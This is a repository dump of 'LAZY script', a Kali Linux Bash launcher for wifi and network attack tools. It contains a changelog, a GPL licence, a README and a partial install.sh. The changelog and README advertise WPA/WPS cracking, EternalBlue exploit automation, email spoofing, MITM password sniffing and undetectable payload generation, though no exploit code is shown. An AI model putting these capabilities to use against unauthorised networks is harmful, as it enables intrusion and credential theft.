├── .gitattributes
├── .gitignore
├── Changelog
├── LICENSE.txt
├── README.md
├── install.sh
├── l
├── lh1
├── lh2
├── lh3
├── lh31
├── lh4
├── lh41
├── lh42
├── lh43
├── ls
├── l131.sh
├── l132.sh
└── l133.sh
├── uninstall.sh
└── version.txt
/.gitattributes:
--------------------------------------------------------------------------------
1 | # Auto detect text files and perform LF normalization
2 | * text=auto
3 |
4 | # Custom for Visual Studio
5 | *.cs diff=csharp
6 |
7 | # Standard to msysgit
8 | *.doc diff=astextplain
9 | *.DOC diff=astextplain
10 | *.docx diff=astextplain
11 | *.DOCX diff=astextplain
12 | *.dot diff=astextplain
13 | *.DOT diff=astextplain
14 | *.pdf diff=astextplain
15 | *.PDF diff=astextplain
16 | *.rtf diff=astextplain
17 | *.RTF diff=astextplain
18 |
--------------------------------------------------------------------------------
/.gitignore:
--------------------------------------------------------------------------------
1 | # Windows image file caches
2 | Thumbs.db
3 | ehthumbs.db
4 |
5 | # Folder config file
6 | Desktop.ini
7 |
8 | # Recycle Bin used on file shares
9 | $RECYCLE.BIN/
10 |
11 | # Windows Installer files
12 | *.cab
13 | *.msi
14 | *.msm
15 | *.msp
16 |
17 | # Windows shortcuts
18 | *.lnk
19 |
20 | # =========================
21 | # Operating System Files
22 | # =========================
23 |
24 | # OSX
25 | # =========================
26 |
27 | .DS_Store
28 | .AppleDouble
29 | .LSOverride
30 |
31 | # Thumbnails
32 | ._*
33 |
34 | # Files that might appear in the root of a volume
35 | .DocumentRevisions-V100
36 | .fseventsd
37 | .Spotlight-V100
38 | .TemporaryItems
39 | .Trashes
40 | .VolumeIcon.icns
41 |
42 | # Directories potentially created on remote AFP share
43 | .AppleDB
44 | .AppleDesktop
45 | Network Trash Folder
46 | Temporary Items
47 | .apdisk
48 |
--------------------------------------------------------------------------------
/Changelog:
--------------------------------------------------------------------------------
1 | 2.0.5
2 | Added option to clean the handshake after being verified.
3 | Automation script for bully.
4 | Check if bully is installed.
5 | Check if wifiautopwner is installed.
6 | Improved code.
7 | Added error message when no networks found in wash/airodump scan.
8 | Added ngrok to downloads.
9 | Added ngrok automation.
10 | Added automated payload genaration for Shellter intergration.
11 |
12 |
13 |
14 | 2.0.4
15 | Cupp moved to other tools.
16 | Added delay to wifi tools.
17 | Fixed eternal scanner not installed error.
18 | Added donation option.
19 | Added shellter to keyboard shortcuts.
20 |
21 |
22 |
23 | 2.0.3
24 | Added Dagon automation script to other tools.
25 | Added LALIN to other tools.
26 | Added LALIN to keyboard shortcuts.
27 | Added error when trying to change interface that is not available.
28 | Added knockmail to infoga tools.
29 |
30 |
31 |
32 | 2.0.2
33 | Improved change mac feature.
34 | Added red color to wirelessinterface if not available.
35 | Added warning to installing u/i.
36 | Added Eaphammer tool to install/reinstall.
37 | Added new fix in errors.
38 | Added Eaphammer automation script.
39 | Added services toggle shortcuts in ks) 2).
40 | Fixed wifiphisher installation.
41 | Added a backup way to seatch for public ip if one fails.
42 | Added close terminal when typing exit.
43 |
44 |
45 | 2.0.1
46 | Improved layout of install/reinstall tool menu.
47 | Added Infoga to information gathering tools.
48 | Public ip error report added.
49 | Fixed anonym8 disabling error.
50 | Fixed last options error in deauth menu.
51 | Added nWatch to wifi tools and to keyboard shortcuts.
52 | Added LICENSE file.
53 | Added Eternal scanner to wifi tools and to keyboard shortcuts.
54 |
55 |
56 | 2.0.0
57 | Winpayloads added to Remote access tools - Generate undetectable payloads.
58 | Added ability to choose another AP without having to scan again in handshake menu.
59 | Improved deauth feature in handshake menu.
60 | Added new deauth option,when capturing on a file.Deauth every client seperately.
61 | Added shellter tool in remote access menu.
62 | Added 1 more fix in errors menu.
63 | Fixed error in metasploit - payload name.
64 | Added support for all payloads in msfvenom automation.
65 | Improved listeners feature in metasploit menu.
66 | Added CHAOS to keyboard shortcuts.
67 | Added routersploit to wifi tools and to keyboard shortcuts.
68 |
69 |
70 | 1.9.9
71 | Added information gathering menu in tools.
72 | Improved code
73 | Added ReconDog in information gathering tools menu
74 | Added RED HAWK in information gathering tools menu
75 | Added Sniper in information gathering tools menu
76 | Fixed anonym8 not installed error
77 | Fixed error in code on install/reinstall tools manu
78 | Added ReconDog to shortcuts
79 | Added RED HAWK to shortcuts
80 | Removed auto installation of all tools in installed
81 |
82 | 1.9.8
83 | Improved handshake feature
84 | Added echoing the handshake directory
85 | Added an error fix in errors menu
86 | Improved code in main menu
87 | Fixed layout in main manu when interface names are different
88 |
89 |
90 | 1.9.7.1
91 | Fixed tiny error when launching script
92 |
93 | 1.9.7
94 | Added open networks in handshake menu
95 | Improved tools menu
96 |
97 | 1.9.6
98 | Added Handshake clean option
99 | Improved WPS PIN cracking code
100 | Improved Handshake feature
101 |
102 |
103 | 1.9.5
104 | Added handshake automation like fluxion.No more copy-paste mac and channel
105 | Added more functions,code easier to read.
106 | Eternalblue added '0' target
107 | Added eternalblue checking in hidden shortcuts
108 |
109 |
110 | 1.9.4
111 | Added two way handshake validation
112 | Custom shortcuts now will not be deleted when updating
113 | Fixed typos etc
114 |
115 |
116 | 1.9.3.2
117 | Spoofed email fixes and additions
118 | Added changelog to hidden shortcuts
119 |
120 |
121 | 1.9.3.1
122 | quick installer fix
123 |
124 |
125 | 1.9.3
126 | Changed script's layout
127 | Added better locating on installer when a tools is already installed
128 | Added Spoof EMAIL feature
129 | Added more functions to code.Easier to read. 32 functions
130 | More changes to code
131 |
132 |
133 | 1.9.2
134 | Added more functions to code.Easier to read.
135 | Replaced 4nonimizer with anonym8
136 | Added option to create a listener when creating a payload
137 | Added encoder to metasploit payload creation
138 | Added msfconsole launcher and msfupdate to metasploit menu
139 | Added hidden shortcuts feature
140 | Added eternalblue exploit automation in hidden features
141 | Added Angry IP Scanner to wifi tools
142 | Option to autostart monitor mode when not already and needed
143 | Scan for networks on spesific channel option
144 |
145 |
146 | 1.9.1
147 | Improved code when going back on navigation manus
148 | Added support for all wireless interface names
149 | Added many functions and improved code
150 | Added hidden shortcuts menu
151 |
152 |
153 | 1.9
154 | Added option to install/reinstall a tool within lscript
155 | Huge code change on the installer, now lscript installs first, then the tools,only if you want
156 | Added openvas to Tools, NOT installed by default
157 | Added TheFatRat to Remote access
158 | Improved code on keyboard shortcuts
159 | Added Metasploit listener creation and saving.Metasploit automation.
160 |
161 |
162 |
163 | 1.8
164 | Massive update to installer(updates now are installed x100 faster)
165 | "7) View your Public IP" option now loads a lot faster
166 | Added "back" option to menus for easier navigation
167 | Added custom keyboard shortcuts option
168 | Added handshake validation
169 | Added site clonning + dnsspoofing in MITM scripts
170 | Added bully wps tool
171 | Added WiFi autopwner toolT
172 | Added Zirikatu payload generator
173 | Added view changelog option
174 | Added metasploit payload creation automation
175 | Latest fluxion added
176 | Improved code in menus(added while loops)
177 | Improved code, many functions added
178 | Improved code, more default variables for easy and fast changes
179 |
180 | 1.7
181 | Added mdk3 deauth method
182 | Removed mac changing of eth0 when typing "start"
183 | Added deauth option even for no file capture
184 | Fluxion updated!
185 | Added websploit wifi tool
186 | Added new fix in "errors"
187 | Added Pupy to remote access
188 |
189 | 1.6
190 | Fixed BeeLogger install error
191 | Added sslstrip2
192 | Added dns2proxy
193 | Added MITM password sniffing automation
194 | Replaced anonym8 with anonsurf
195 | Replaced torghost with 4nonimizer
196 |
197 |
198 | 1.5
199 | organised some code
200 | fixed random bugs
201 | fixed mistake when selecting xerxes dos tool
202 | checking if monitor mode enabled on options 10 11 12
203 | checking if monitor mode disabled on option 7
204 |
205 |
206 |
207 | 1.4
208 | Fixed typos
209 | Updated installer
210 | Added xterm bottom right position when deauthing on handshake capture
211 | Added pixie dust WPS pin cracking
212 | Changed WPS pin cracking code
213 | Improved position of new gnome-terminals on handshake and WPS pin finding features
214 | Improved update feature , testing connection before updating
215 |
216 |
217 | 1.3
218 | Fixed colors on interface selection
219 | Added "Main menu" and "Exit" on interface selection
220 | Added option to not create a file on handshake capture
221 | Added .csv and .netxml file cleanup on handshake capture
222 | Fixed typo on install.sh
223 |
224 | 1.2
225 | removed shARP as it has problems
226 | added Xerxes DoS tool
227 | added ezsploit tool on remote access
228 | added ezsploit to installer
229 | added Katana framework on wifi tools
230 | added Katana framework on installer
231 | added wifiphisher compatibility if you only have one wlan inteface
232 | added airgeddon to wifi tools
233 | added airgeddon to installer
234 |
235 | 0.3
236 | added wifite to WEP hacking
237 | added shARP network defender on Tools
238 | added shARP installation to install.sh
239 | added mdk3-master to Tools
240 | added mdk3-master to install.sh
241 | added wash error on error-fixing (type "errors")
242 |
243 | 0.2
244 | Added ghost phisher tool
245 |
--------------------------------------------------------------------------------
/LICENSE.txt:
--------------------------------------------------------------------------------
1 | GNU GENERAL PUBLIC LICENSE
2 | Version 2, June 1991
3 |
4 | Copyright (C) 1989, 1991 Free Software Foundation, Inc.,
5 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA
6 | Everyone is permitted to copy and distribute verbatim copies
7 | of this license document, but changing it is not allowed.
8 |
9 | Preamble
10 |
11 | The licenses for most software are designed to take away your
12 | freedom to share and change it. By contrast, the GNU General Public
13 | License is intended to guarantee your freedom to share and change free
14 | software--to make sure the software is free for all its users. This
15 | General Public License applies to most of the Free Software
16 | Foundation's software and to any other program whose authors commit to
17 | using it. (Some other Free Software Foundation software is covered by
18 | the GNU Lesser General Public License instead.) You can apply it to
19 | your programs, too.
20 |
21 | When we speak of free software, we are referring to freedom, not
22 | price. Our General Public Licenses are designed to make sure that you
23 | have the freedom to distribute copies of free software (and charge for
24 | this service if you wish), that you receive source code or can get it
25 | if you want it, that you can change the software or use pieces of it
26 | in new free programs; and that you know you can do these things.
27 |
28 | To protect your rights, we need to make restrictions that forbid
29 | anyone to deny you these rights or to ask you to surrender the rights.
30 | These restrictions translate to certain responsibilities for you if you
31 | distribute copies of the software, or if you modify it.
32 |
33 | For example, if you distribute copies of such a program, whether
34 | gratis or for a fee, you must give the recipients all the rights that
35 | you have. You must make sure that they, too, receive or can get the
36 | source code. And you must show them these terms so they know their
37 | rights.
38 |
39 | We protect your rights with two steps: (1) copyright the software, and
40 | (2) offer you this license which gives you legal permission to copy,
41 | distribute and/or modify the software.
42 |
43 | Also, for each author's protection and ours, we want to make certain
44 | that everyone understands that there is no warranty for this free
45 | software. If the software is modified by someone else and passed on, we
46 | want its recipients to know that what they have is not the original, so
47 | that any problems introduced by others will not reflect on the original
48 | authors' reputations.
49 |
50 | Finally, any free program is threatened constantly by software
51 | patents. We wish to avoid the danger that redistributors of a free
52 | program will individually obtain patent licenses, in effect making the
53 | program proprietary. To prevent this, we have made it clear that any
54 | patent must be licensed for everyone's free use or not licensed at all.
55 |
56 | The precise terms and conditions for copying, distribution and
57 | modification follow.
58 |
59 | GNU GENERAL PUBLIC LICENSE
60 | TERMS AND CONDITIONS FOR COPYING, DISTRIBUTION AND MODIFICATION
61 |
62 | 0. This License applies to any program or other work which contains
63 | a notice placed by the copyright holder saying it may be distributed
64 | under the terms of this General Public License. The "Program", below,
65 | refers to any such program or work, and a "work based on the Program"
66 | means either the Program or any derivative work under copyright law:
67 | that is to say, a work containing the Program or a portion of it,
68 | either verbatim or with modifications and/or translated into another
69 | language. (Hereinafter, translation is included without limitation in
70 | the term "modification".) Each licensee is addressed as "you".
71 |
72 | Activities other than copying, distribution and modification are not
73 | covered by this License; they are outside its scope. The act of
74 | running the Program is not restricted, and the output from the Program
75 | is covered only if its contents constitute a work based on the
76 | Program (independent of having been made by running the Program).
77 | Whether that is true depends on what the Program does.
78 |
79 | 1. You may copy and distribute verbatim copies of the Program's
80 | source code as you receive it, in any medium, provided that you
81 | conspicuously and appropriately publish on each copy an appropriate
82 | copyright notice and disclaimer of warranty; keep intact all the
83 | notices that refer to this License and to the absence of any warranty;
84 | and give any other recipients of the Program a copy of this License
85 | along with the Program.
86 |
87 | You may charge a fee for the physical act of transferring a copy, and
88 | you may at your option offer warranty protection in exchange for a fee.
89 |
90 | 2. You may modify your copy or copies of the Program or any portion
91 | of it, thus forming a work based on the Program, and copy and
92 | distribute such modifications or work under the terms of Section 1
93 | above, provided that you also meet all of these conditions:
94 |
95 | a) You must cause the modified files to carry prominent notices
96 | stating that you changed the files and the date of any change.
97 |
98 | b) You must cause any work that you distribute or publish, that in
99 | whole or in part contains or is derived from the Program or any
100 | part thereof, to be licensed as a whole at no charge to all third
101 | parties under the terms of this License.
102 |
103 | c) If the modified program normally reads commands interactively
104 | when run, you must cause it, when started running for such
105 | interactive use in the most ordinary way, to print or display an
106 | announcement including an appropriate copyright notice and a
107 | notice that there is no warranty (or else, saying that you provide
108 | a warranty) and that users may redistribute the program under
109 | these conditions, and telling the user how to view a copy of this
110 | License. (Exception: if the Program itself is interactive but
111 | does not normally print such an announcement, your work based on
112 | the Program is not required to print an announcement.)
113 |
114 | These requirements apply to the modified work as a whole. If
115 | identifiable sections of that work are not derived from the Program,
116 | and can be reasonably considered independent and separate works in
117 | themselves, then this License, and its terms, do not apply to those
118 | sections when you distribute them as separate works. But when you
119 | distribute the same sections as part of a whole which is a work based
120 | on the Program, the distribution of the whole must be on the terms of
121 | this License, whose permissions for other licensees extend to the
122 | entire whole, and thus to each and every part regardless of who wrote it.
123 |
124 | Thus, it is not the intent of this section to claim rights or contest
125 | your rights to work written entirely by you; rather, the intent is to
126 | exercise the right to control the distribution of derivative or
127 | collective works based on the Program.
128 |
129 | In addition, mere aggregation of another work not based on the Program
130 | with the Program (or with a work based on the Program) on a volume of
131 | a storage or distribution medium does not bring the other work under
132 | the scope of this License.
133 |
134 | 3. You may copy and distribute the Program (or a work based on it,
135 | under Section 2) in object code or executable form under the terms of
136 | Sections 1 and 2 above provided that you also do one of the following:
137 |
138 | a) Accompany it with the complete corresponding machine-readable
139 | source code, which must be distributed under the terms of Sections
140 | 1 and 2 above on a medium customarily used for software interchange; or,
141 |
142 | b) Accompany it with a written offer, valid for at least three
143 | years, to give any third party, for a charge no more than your
144 | cost of physically performing source distribution, a complete
145 | machine-readable copy of the corresponding source code, to be
146 | distributed under the terms of Sections 1 and 2 above on a medium
147 | customarily used for software interchange; or,
148 |
149 | c) Accompany it with the information you received as to the offer
150 | to distribute corresponding source code. (This alternative is
151 | allowed only for noncommercial distribution and only if you
152 | received the program in object code or executable form with such
153 | an offer, in accord with Subsection b above.)
154 |
155 | The source code for a work means the preferred form of the work for
156 | making modifications to it. For an executable work, complete source
157 | code means all the source code for all modules it contains, plus any
158 | associated interface definition files, plus the scripts used to
159 | control compilation and installation of the executable. However, as a
160 | special exception, the source code distributed need not include
161 | anything that is normally distributed (in either source or binary
162 | form) with the major components (compiler, kernel, and so on) of the
163 | operating system on which the executable runs, unless that component
164 | itself accompanies the executable.
165 |
166 | If distribution of executable or object code is made by offering
167 | access to copy from a designated place, then offering equivalent
168 | access to copy the source code from the same place counts as
169 | distribution of the source code, even though third parties are not
170 | compelled to copy the source along with the object code.
171 |
172 | 4. You may not copy, modify, sublicense, or distribute the Program
173 | except as expressly provided under this License. Any attempt
174 | otherwise to copy, modify, sublicense or distribute the Program is
175 | void, and will automatically terminate your rights under this License.
176 | However, parties who have received copies, or rights, from you under
177 | this License will not have their licenses terminated so long as such
178 | parties remain in full compliance.
179 |
180 | 5. You are not required to accept this License, since you have not
181 | signed it. However, nothing else grants you permission to modify or
182 | distribute the Program or its derivative works. These actions are
183 | prohibited by law if you do not accept this License. Therefore, by
184 | modifying or distributing the Program (or any work based on the
185 | Program), you indicate your acceptance of this License to do so, and
186 | all its terms and conditions for copying, distributing or modifying
187 | the Program or works based on it.
188 |
189 | 6. Each time you redistribute the Program (or any work based on the
190 | Program), the recipient automatically receives a license from the
191 | original licensor to copy, distribute or modify the Program subject to
192 | these terms and conditions. You may not impose any further
193 | restrictions on the recipients' exercise of the rights granted herein.
194 | You are not responsible for enforcing compliance by third parties to
195 | this License.
196 |
197 | 7. If, as a consequence of a court judgment or allegation of patent
198 | infringement or for any other reason (not limited to patent issues),
199 | conditions are imposed on you (whether by court order, agreement or
200 | otherwise) that contradict the conditions of this License, they do not
201 | excuse you from the conditions of this License. If you cannot
202 | distribute so as to satisfy simultaneously your obligations under this
203 | License and any other pertinent obligations, then as a consequence you
204 | may not distribute the Program at all. For example, if a patent
205 | license would not permit royalty-free redistribution of the Program by
206 | all those who receive copies directly or indirectly through you, then
207 | the only way you could satisfy both it and this License would be to
208 | refrain entirely from distribution of the Program.
209 |
210 | If any portion of this section is held invalid or unenforceable under
211 | any particular circumstance, the balance of the section is intended to
212 | apply and the section as a whole is intended to apply in other
213 | circumstances.
214 |
215 | It is not the purpose of this section to induce you to infringe any
216 | patents or other property right claims or to contest validity of any
217 | such claims; this section has the sole purpose of protecting the
218 | integrity of the free software distribution system, which is
219 | implemented by public license practices. Many people have made
220 | generous contributions to the wide range of software distributed
221 | through that system in reliance on consistent application of that
222 | system; it is up to the author/donor to decide if he or she is willing
223 | to distribute software through any other system and a licensee cannot
224 | impose that choice.
225 |
226 | This section is intended to make thoroughly clear what is believed to
227 | be a consequence of the rest of this License.
228 |
229 | 8. If the distribution and/or use of the Program is restricted in
230 | certain countries either by patents or by copyrighted interfaces, the
231 | original copyright holder who places the Program under this License
232 | may add an explicit geographical distribution limitation excluding
233 | those countries, so that distribution is permitted only in or among
234 | countries not thus excluded. In such case, this License incorporates
235 | the limitation as if written in the body of this License.
236 |
237 | 9. The Free Software Foundation may publish revised and/or new versions
238 | of the General Public License from time to time. Such new versions will
239 | be similar in spirit to the present version, but may differ in detail to
240 | address new problems or concerns.
241 |
242 | Each version is given a distinguishing version number. If the Program
243 | specifies a version number of this License which applies to it and "any
244 | later version", you have the option of following the terms and conditions
245 | either of that version or of any later version published by the Free
246 | Software Foundation. If the Program does not specify a version number of
247 | this License, you may choose any version ever published by the Free Software
248 | Foundation.
249 |
250 | 10. If you wish to incorporate parts of the Program into other free
251 | programs whose distribution conditions are different, write to the author
252 | to ask for permission. For software which is copyrighted by the Free
253 | Software Foundation, write to the Free Software Foundation; we sometimes
254 | make exceptions for this. Our decision will be guided by the two goals
255 | of preserving the free status of all derivatives of our free software and
256 | of promoting the sharing and reuse of software generally.
257 |
258 | NO WARRANTY
259 |
260 | 11. BECAUSE THE PROGRAM IS LICENSED FREE OF CHARGE, THERE IS NO WARRANTY
261 | FOR THE PROGRAM, TO THE EXTENT PERMITTED BY APPLICABLE LAW. EXCEPT WHEN
262 | OTHERWISE STATED IN WRITING THE COPYRIGHT HOLDERS AND/OR OTHER PARTIES
263 | PROVIDE THE PROGRAM "AS IS" WITHOUT WARRANTY OF ANY KIND, EITHER EXPRESSED
264 | OR IMPLIED, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED WARRANTIES OF
265 | MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE. THE ENTIRE RISK AS
266 | TO THE QUALITY AND PERFORMANCE OF THE PROGRAM IS WITH YOU. SHOULD THE
267 | PROGRAM PROVE DEFECTIVE, YOU ASSUME THE COST OF ALL NECESSARY SERVICING,
268 | REPAIR OR CORRECTION.
269 |
270 | 12. IN NO EVENT UNLESS REQUIRED BY APPLICABLE LAW OR AGREED TO IN WRITING
271 | WILL ANY COPYRIGHT HOLDER, OR ANY OTHER PARTY WHO MAY MODIFY AND/OR
272 | REDISTRIBUTE THE PROGRAM AS PERMITTED ABOVE, BE LIABLE TO YOU FOR DAMAGES,
273 | INCLUDING ANY GENERAL, SPECIAL, INCIDENTAL OR CONSEQUENTIAL DAMAGES ARISING
274 | OUT OF THE USE OR INABILITY TO USE THE PROGRAM (INCLUDING BUT NOT LIMITED
275 | TO LOSS OF DATA OR DATA BEING RENDERED INACCURATE OR LOSSES SUSTAINED BY
276 | YOU OR THIRD PARTIES OR A FAILURE OF THE PROGRAM TO OPERATE WITH ANY OTHER
277 | PROGRAMS), EVEN IF SUCH HOLDER OR OTHER PARTY HAS BEEN ADVISED OF THE
278 | POSSIBILITY OF SUCH DAMAGES.
279 |
280 | END OF TERMS AND CONDITIONS
281 |
282 | How to Apply These Terms to Your New Programs
283 |
284 | If you develop a new program, and you want it to be of the greatest
285 | possible use to the public, the best way to achieve this is to make it
286 | free software which everyone can redistribute and change under these terms.
287 |
288 | To do so, attach the following notices to the program. It is safest
289 | to attach them to the start of each source file to most effectively
290 | convey the exclusion of warranty; and each file should have at least
291 | the "copyright" line and a pointer to where the full notice is found.
292 |
293 | Copyright (C) 2017 Aris Melachroinos
294 |
295 | This program is free software; you can redistribute it and/or modify
296 | it under the terms of the GNU General Public License as published by
297 | the Free Software Foundation; either version 2 of the License, or
298 | (at your option) any later version.
299 |
300 | This program is distributed in the hope that it will be useful,
301 | but WITHOUT ANY WARRANTY; without even the implied warranty of
302 | MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
303 | GNU General Public License for more details.
304 |
305 | You should have received a copy of the GNU General Public License along
306 | with this program; if not, write to the Free Software Foundation, Inc.,
307 | 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
308 |
309 | Also add information on how to contact you by electronic and paper mail.
310 |
311 | If the program is interactive, make it output a short notice like this
312 | when it starts in an interactive mode:
313 |
314 | Gnomovision version 69, Copyright (C) year name of author
315 | Gnomovision comes with ABSOLUTELY NO WARRANTY; for details type `show w'.
316 | This is free software, and you are welcome to redistribute it
317 | under certain conditions; type `show c' for details.
318 |
319 | The hypothetical commands `show w' and `show c' should show the appropriate
320 | parts of the General Public License. Of course, the commands you use may
321 | be called something other than `show w' and `show c'; they could even be
322 | mouse-clicks or menu items--whatever suits your program.
323 |
324 | You should also get your employer (if you work as a programmer) or your
325 | school, if any, to sign a "copyright disclaimer" for the program, if
326 | necessary. Here is a sample; alter the names:
327 |
328 | Yoyodyne, Inc., hereby disclaims all copyright interest in the program
329 | `Gnomovision' (which makes passes at compilers) written by James Hacker.
330 |
331 | {signature of Ty Coon}, 1 April 1989
332 | Ty Coon, President of Vice
333 |
334 | This General Public License does not permit incorporating your program into
335 | proprietary programs. If your program is a subroutine library, you may
336 | consider it more useful to permit linking proprietary applications with the
337 | library. If this is what you want to do, use the GNU Lesser General
338 | Public License instead of this License.
--------------------------------------------------------------------------------
/README.md:
--------------------------------------------------------------------------------
1 | ## Welcome to the LAZY script v2.0.5
2 |
3 |
4 |
5 |
6 |
7 |
8 |
9 |
10 |
11 | A video Hackersploit made : https://www.youtube.com/watch?v=oBpo5sElrMY
12 |
13 | A video sstec made: https://www.youtube.com/watch?v=gSO7c2MN7TY
14 |
15 | **For feature-recommendation , add it on the "Issues" tab. NOW!**
16 |
17 | **I AM NOT RESPONSIBLE HOW YOU USE THIS TOOL.BE LEGAL AND NOT STUPID.**
18 |
19 | **This script will make your life easier, and of course faster.**
20 |
21 | **Its not only for noobs.Its for whoever wants to type less and do actually more.**
22 |
23 | ### What is this
24 | This is a script for Kali Linux that automates many procedures about wifi penetration and hacking.
25 | I actually made it for fun for me just to save some time, but i don't mind publicing it.
26 |
27 | ### Features
28 |
29 | ### NEW FEATURE: Custom keyboard shortcuts!! Launch any tool within lscript , with your own shortcuts!!! (type ks to set your shortcuts)
30 |
31 | Enabling-Disabling interfaces faster
32 | Changing Mac faster
33 | Anonymizing yourself faster
34 | View your public IP faster
35 | View your MAC faster
36 |
37 | **TOOLS**
38 |
39 | You can install whichever tool(s) you want from within lscript!
40 | Fluxion by Deltaxflux
41 | WifiTe by derv82
42 | Wifiphisher by Dan McInerney
43 | Zatacker by LawrenceThePentester
44 | Morpheus by Pedro ubuntu [ r00t-3xp10it ]
45 | Osrframework by i3visio
46 | Hakku by 4shadoww
47 | Trity by Toxic-ig
48 | Cupp by Muris Kurgas
49 | Dracnmap by Edo -maland-
50 | Fern Wifi Cracker by Savio-code
51 | Kichthemout by Nikolaos Kamarinakis & David Schütz
52 | BeeLogger by Alisson Moretto - 4w4k3
53 | Ghost-Phisher by Savio-code
54 | Mdk3-master by Musket Developer
55 | Anonsurf by Und3rf10w
56 | The Eye by EgeBalci
57 | Airgeddon by v1s1t0r1sh3r3
58 | Xerxes by zanyarjamal
59 | Ezsploit by rand0m1ze
60 | Katana framework by PowerScript
61 | 4nonimizer by Hackplayers
62 | Sslstrip2 by LeonardoNve
63 | Dns2proxy by LeonardoNve
64 | Pupy by n1nj4sec
65 | Zirikatu by pasahitz
66 | TheFatRat by Sceetsec
67 | Angry IP Scanner by Anton Keks
68 | Sniper by 1N3
69 | ReconDog by UltimateHackers
70 | RED HAWK by Tuhinshubhra
71 | Routersploit by Reverse shell
72 | CHAOS by Tiagorlampert
73 | Winpayloads by Ncc group
74 | Infoga by m4ll0k
75 | nWatch by Suraj
76 | Eternal scanner by Peterpt
77 | Eaphammer by S0lst1c3
78 | Dagon by Ekultek
79 | LALIN by Screetsec
80 | MORE ARE BEING ADDED ON EVERY UPDATE
81 |
82 | **Wifi password scripts**
83 |
84 | Handshake (WPA-WPA2)
85 | Find WPS pin (WPA-WPA2)
86 | WEP hacking (WEP)
87 |
88 | **Others**
89 |
90 | Email spoofing
91 | Metasploit automation (create payloads,listeners,save listeners for later etc...)
92 | Auto eternalblue exploiting (check on ks) -> hidden shortcuts
93 |
94 | # How to install (Kali Linux)
95 | (make sure you are a root user)
96 |
97 | **Be carefull.If you download it as a .zip file, it will not run.Make sure to follow these simple instructions.**
98 |
99 | ```
100 | cd
101 | git clone https://github.com/arismelachroinos/lscript.git
102 | cd lscript
103 | chmod +x install.sh
104 | ./install.sh
105 | ```
106 |
107 | ### How to run it
108 |
109 | (make sure you are a root user)
110 |
111 | ```
112 | open terminal
113 | type "l"
114 | press enter
115 | ```
116 | **(Not even "lazy"!! Just "l"! The less you type , the better!)**
117 |
118 | ### How to uninstall
119 | ```
120 | cd /root/lscript
121 | ./uninstall.sh
122 | rmdir -r /root/lscript
123 | ```
124 |
125 | ### How to update
126 | ```
127 | Run the script
128 | Type "update"
129 | ```
130 |
131 | ### Donate
132 | If you like my work, consider buying me a coffee :)
133 |
134 | [](https://www.paypal.com/cgi-bin/webscr?cmd=_s-xclick&hosted_button_id=GC9RSY4CS6KAY)
135 |
136 |
--------------------------------------------------------------------------------
/install.sh:
--------------------------------------------------------------------------------
1 | #! /bin/bash
2 | clear
3 | printf '\033]2;INSTALLER\a'
4 | #~ echo -e "\e[1;33m 1\e[0m) KALI"
5 | #~ echo -e "\e[1;33m 2\e[0m) UBUNTU"
6 | #~ echo -e "Choose your OS: "
7 | #~ read OS
8 | echo -e "Press \e[1;33many key\e[0m to install the script..."
9 | read -n 1
10 | clear
11 | DIR="$( cd "$( dirname "${BASH_SOURCE[0]}" )" && pwd )"
12 | if [[ $DIR != "/root/lscript" ]]
13 | then
14 | echo -e "You didn't follow the github's simple install instructions.I will try to do it for you..."
15 | sleep 4
16 | if [ -d /root/lscript ]
17 | then
18 | rm -r /root/lscript
19 | fi
20 | mkdir /root/lscript
21 | cp -r "$DIR"/* /root/lscript
22 | chmod +x /root/lscript/install.sh
23 | if [ $OS = 2 ]
24 | then
25 | gnome-terminal -e "sudo bash /root/lscript/install.sh"
26 | else
27 | gnome-terminal -e "bash /root/lscript/install.sh"
28 | fi
29 | sleep 2
30 | kill -9 $PPID
31 | exit
32 | fi
33 | echo -e "Installing lscript..."
34 | sleep 1
35 | echo -e "Fixing permissions"
36 | sleep 2
37 | chmod +x /root/lscript/lh1
38 | chmod +x /root/lscript/lh2
39 | chmod +x /root/lscript/lh3
40 | #chmod +x /root/lscript/lh21
41 | chmod +x /root/lscript/lh31
42 | chmod +x /root/lscript/l
43 | chmod +x /root/lscript/lh4
44 | chmod +x /root/lscript/lh41
45 | chmod +x /root/lscript/lh42
46 | chmod +x /root/lscript/lh43
47 | chmod +x /root/lscript/ls/l131.sh
48 | chmod +x /root/lscript/ls/l132.sh
49 | chmod +x /root/lscript/ls/l133.sh
50 | chmod +x /root/lscript/uninstall.sh
51 | clear
52 | echo -e "Copying script to /bin/lscript"
53 | sleep 1
54 | mkdir /bin/lscript
55 | cd /root/lscript
56 | if [ $OS = 2 ]
57 | then
58 | cp /root/lscript/l /bin/lscript/u
59 | echo -e "I am an Ubuntu user" > /root/lscript/ubuntu.txt
60 | else
61 | cp /root/lscript/l /bin/lscript
62 | fi
63 | cp /root/lscript/lh1 /bin/lscript
64 | cp /root/lscript/lh2 /bin/lscript
65 | cp /root/lscript/lh3 /bin/lscript
66 | cp /root/lscript/lh31 /bin/lscript
67 | cp /root/lscript/lh4 /bin/lscript
68 | cp /root/lscript/lh41 /bin/lscript
69 | cp /root/lscript/lh42 /bin/lscript
70 | cp /root/lscript/lh43 /bin/lscript
71 | clear
72 | if [ ! -d /root/handshakes ]
73 | then
74 | mkdir /root/handshakes
75 | echo -e "Made /root/handshake directory"
76 | else
77 | echo -e "/root/handshakes directory detected.Good."
78 | fi
79 | if [ ! -d /root/wordlists ]
80 | then
81 | mkdir /root/wordlists
82 | echo -e "Made /root/wordlists directory"
83 | else
84 | echo -e "/root/wordlists directory detected.Good."
85 | fi
86 | while true
87 | do
88 | clear
89 | echo -e "Are you \e[1;33mu\e[0mpdating or \e[1;33mi\e[0mnstalling the script?(\e[1;33mu\e[0m/\e[1;33mi\e[0m): "
90 | echo -e "Only use 'i' for the first time."
91 | read UORI
92 | if [ "$UORI" = "u" ]
93 | then
94 | clear
95 | echo -e "Type 'changelog' to see what's new on this version"
96 | sleep 3
97 | break
98 | elif [ "$UORI" = "i" ]
99 | then
100 | clear
101 | BASHCHECK=$(cat ~/.bashrc | grep "bin/lscript")
102 | if [[ $BASHCHECK != "" ]]
103 | then
104 | echo -e "I SAID USE i ONLY ONE TIME..........."
105 | sleep 3
106 | fi
107 | echo -e "Adding lscript to PATH so you can access it from anywhere"
108 | sleep 1
109 | export PATH=/bin/lscript:$PATH
110 | sleep 1
